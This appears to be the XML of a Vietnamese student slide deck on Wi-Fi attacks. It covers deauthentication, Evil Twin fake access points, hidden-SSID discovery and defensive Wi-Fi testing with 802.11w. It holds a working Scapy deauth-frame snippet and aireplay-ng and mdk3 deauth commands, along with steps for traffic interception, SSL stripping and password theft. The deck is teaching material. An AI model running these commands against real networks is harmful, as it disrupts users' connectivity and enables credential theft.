                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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addr2=ap_mac, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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addr3=ap_mac)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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deauth_frame = RadioTap()/dot11/Dot11Deauth(reason=7)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2839" b="1">
              <a:solidFill>
                <a:srgbClr val="449FA2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975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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sendp(deauth_frame, iface=iface, count=100, inter=0.1)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856114" y="2955385"/>
            <a:ext cx="2044290" cy="2117438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2044290" h="2117438">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2044290" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044290" y="2117438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="211743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67171" y="2237897"/>
            <a:ext cx="5853103" cy="4185855"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5853103" h="4185855">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5853103" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5853103" y="4185855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="418585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12021" y="6708855"/>
            <a:ext cx="5821326" cy="2063603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5821326" h="2063603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5821326" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5821326" y="2063603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="206360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385545" y="464660"/>
            <a:ext cx="5516910" cy="12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Công </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1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cụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA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81605" y="2909377"/>
            <a:ext cx="4978896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aireplay-ng \</a:t>
            </a:r>
          </a:p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--deauth 10 \</a:t>
            </a:r>
          </a:p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-a 00:11:22:33:44:55 \</a:t>
            </a:r>
          </a:p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-c 66:77:88:99:AA:BB \</a:t>
            </a:r>
          </a:p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wlan0mon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8709" y="6837650"/>
            <a:ext cx="447694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mdk3 wlan0mon d \</a:t>
            </a:r>
          </a:p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-c 6 \</a:t>
            </a:r>
          </a:p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49F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-b 00:11:22:33:44:55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66275" y="519194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28936" y="5707657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9070" y="234500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45855" y="1122041"/>
            <a:ext cx="999629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 err="1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Ứng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="72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7200" dirty="0" err="1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dụng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA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408221" y="2843415"/>
            <a:ext cx="7471557" cy="5343295"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7471557" h="5343295">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7471558" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7471558" y="5343295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="534329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092093" y="3268052"/>
            <a:ext cx="5537031" cy="419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4"/>
              </a:lnSpc>
            </a:pP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Evil Twin Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="8474"/>
              </a:lnSpc>
            </a:pP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SSID Clocking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="8474"/>
              </a:lnSpc>
            </a:pP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Kiểm</a:t>
            </a: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thử</a:t>
            </a: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mạng</a:t>
            </a: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Wi-Fi </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="8474"/>
              </a:lnSpc>
            </a:pP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Kiểm</a:t>
            </a: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tra</a:t>
            </a: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roaming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96785" y="3245602"/>
            <a:ext cx="873471" cy="415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1</a:t>
            </a:r>
          </a:p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2</a:t>
            </a:r>
          </a:p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3</a:t>
            </a:r>
          </a:p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4237" y="617505"/>
            <a:ext cx="715952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Evil Twin Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1400184" y="1944114"/>
            <a:ext cx="15950309" cy="15933642"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15950309" h="15933642">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15950309" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15950309" y="15933642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1593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31419" y="2202561"/>
            <a:ext cx="15087838" cy="672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⚔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Mục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đích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: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dụ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nạn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nhân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kết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nối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vào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điểm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truy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cập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giả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mạo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(Fake AP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5915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📌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Cách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thức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tấn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công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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5915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1️⃣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Tạo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Fake AP (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hostapd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, airbase-ng)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5915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2️⃣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Ngắt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kết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nối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nạn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nhân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(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aireplay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-ng, mdk3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5915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3️⃣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Tấn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công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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1511301" lvl="2" indent="-503767" algn="l">
              <a:lnSpc>
                <a:spcPts val="5915"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Chặn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dữ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liệu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(Wireshark,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tcpdump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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1511301" lvl="2" indent="-503767" algn="l">
              <a:lnSpc>
                <a:spcPts val="5915"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Tấn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công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SSL Strip (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Bettercap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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1511301" lvl="2" indent="-503767" algn="l">
              <a:lnSpc>
                <a:spcPts val="5915"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Đánh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cắp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mật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khẩu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(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dnsspoof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,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ettercap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)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5915"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sauce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7009" y="229001"/>
            <a:ext cx="1726721" cy="1582305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1726721" h="1582305">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1726722" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726722" y="1582304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158230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5164" y="-598732"/>
            <a:ext cx="3520021" cy="2963217"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3520021" h="2963217">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3520020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3520020" y="2963218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="296321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828353" y="5143500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7866" y="4067720"/>
            <a:ext cx="3998516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Evil Twin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="9799"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="69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Attack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811719" y="4955162"/>
            <a:ext cx="826584" cy="790515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="826584" h="790515">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="826584" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826584" y="790515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="79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-869387" y="2891356"/>
            <a:ext cx="3672771" cy="2670310"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3672771" h="2670310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3672771" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3672771" y="2670310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2670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1398963" y="7916207"/>
            <a:ext cx="4007115" cy="3395119"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4007115" h="3395119">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4007115" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007115" y="3395119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3395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-1659256" y="5228702"/>
            <a:ext cx="3757307" cy="3723150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3757307" h="3723150">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3757308" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3757308" y="3723150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3723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-1104866" y="54102"/>
            <a:ext cx="3959504" cy="2598874"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3959504" h="2598874">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3959504" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3959504" y="2598874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25988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452784">
            <a:off x="880648" y="481329"/>
            <a:ext cx="1188398" cy="719521"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1188398" h="719521">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1188398" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1188398" y="719521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="719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-402537" y="8946915"/>
            <a:ext cx="2117667" cy="2161697"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2117667" h="2161697">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2117667" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2117667" y="2161697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2161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092093" y="310956"/>
            <a:ext cx="10820867" cy="9711728"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10820867" h="9711728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10820867" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820867" y="9711728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="971172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-82180" y="3391834"/>
            <a:ext cx="1643651" cy="1761246"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1643651" h="1761246">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1643651" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1643651" y="1761246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176124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02154" y="8187874"/>
            <a:ext cx="1376634" cy="1425892"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1376634" h="1425892">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1376633" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1376633" y="1425892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="14258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091870" y="7090277"/>
            <a:ext cx="1532055" cy="1403919"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1532055" h="1403919">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1532055" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1532055" y="1403919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="140391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990471" y="-128069"/>
            <a:ext cx="3520021" cy="2963217"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3520021" h="2963217">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3520020" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3520020" y="2963217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="296321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3548" y="895350"/>
            <a:ext cx="9060905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SSID Cloaking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971032" y="2600753"/>
            <a:ext cx="14345935" cy="5085494"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14345935" h="5085494">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14345936" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14345936" y="5085494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="508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54521" y="3240405"/>
            <a:ext cx="13178958" cy="369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⚔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Mục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đích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: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Lấy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SSID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của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thiết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bị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ẩn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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5880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📌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Cách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thức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tấn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công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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5880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  1.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Xác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định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SSID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bị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ẩn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(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lấy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SSID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ẩn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trong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Probe Response)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5880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  2.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Tạo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AP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giả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với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SSID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đó</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sauce Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="5880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  3.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Ép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thiết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bị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kết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nối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vào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AP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giả</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sauce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37589" y="771086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99968" y="6340603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445519" y="-740767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0857" y="2951421"/>
            <a:ext cx="14996990" cy="10725120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14996990" h="10725120">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14996990" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14996990" y="10725121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10725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31862" y="9176979"/>
            <a:ext cx="1287490" cy="1231309"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1287490" h="1231309">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1287490" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1287490" y="1231308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1231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64645" y="8114872"/>
            <a:ext cx="5720718" cy="4159282"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5720718" h="4159282">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5720718" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5720718" y="4159282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4159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95461" y="8114872"/>
            <a:ext cx="6241493" cy="5288246"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6241493" h="5288246">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6241492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6241492" y="5288246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="52882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59417" y="8459384"/>
            <a:ext cx="5852392" cy="5799188"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5852392" h="5799188">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5852392" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5852392" y="5799188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="57991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33612" y="8313982"/>
            <a:ext cx="6167334" cy="4048014"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6167334" h="4048014">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6167334" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6167334" y="4048013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40480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47215">
            <a:off x="926336" y="8843123"/>
            <a:ext cx="1851052" cy="1120728"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1851052" h="1120728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1851052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851052" y="1120728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11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11809" y="8994931"/>
            <a:ext cx="3298484" cy="3367065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3298484" h="3367065">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3298484" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3298484" y="3367064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33670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916492" y="9176979"/>
            <a:ext cx="2560156" cy="2743322"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2560156" h="2743322">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2560156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2560156" y="2743321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274332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152812" y="990094"/>
            <a:ext cx="7674556" cy="151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8795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Member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54949" y="5713179"/>
            <a:ext cx="3375620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Nguyễn Hữu Trí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35048" y="4062063"/>
            <a:ext cx="4162326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Nguyễn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Bá Chí Tân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72537" y="4062063"/>
            <a:ext cx="4572595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Nguyễn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Công Quang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07825" y="7177391"/>
            <a:ext cx="3616771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Dương Gia Lâm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09224" y="7177391"/>
            <a:ext cx="4099223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Trần Anh Nhật Việt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0184" y="2230541"/>
            <a:ext cx="15663582" cy="15647214"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15663582" h="15647214">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15663582" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15663582" y="15647215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15647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56318" y="914400"/>
            <a:ext cx="9575364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🛠 Kiểm thử mạng Wi-Fi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4477" y="2623505"/>
            <a:ext cx="14759045" cy="548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93"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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Mục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đích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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1468119" lvl="2" indent="-489373" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Đánh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giá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độ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an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toàn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của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hệ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thống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Wi-Fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1468119" lvl="2" indent="-489373" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Tránh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bị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tấn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công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từ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bên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trong</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3399" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sauce Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="734059" lvl="1" indent="-367030" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pP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Cách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thức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: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1468119" lvl="2" indent="-489373" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Mô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phỏng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Deauth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Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1468119" lvl="2" indent="-489373" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="⚬"/>
            </a:pP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Nếu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hệ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thống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có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802.11w (PMF)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hoặc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các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cơ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chế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bảo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mật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khác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</a:p>
          <a:p>
            <a:pPr marL="978746" lvl="2" algn="just">
              <a:lnSpc>
                <a:spcPts val="4793"/>
              </a:lnSpc>
            </a:pP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--&gt;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Mạng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an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toàn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3399" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Open Sauce Bold"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Open Sauce Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
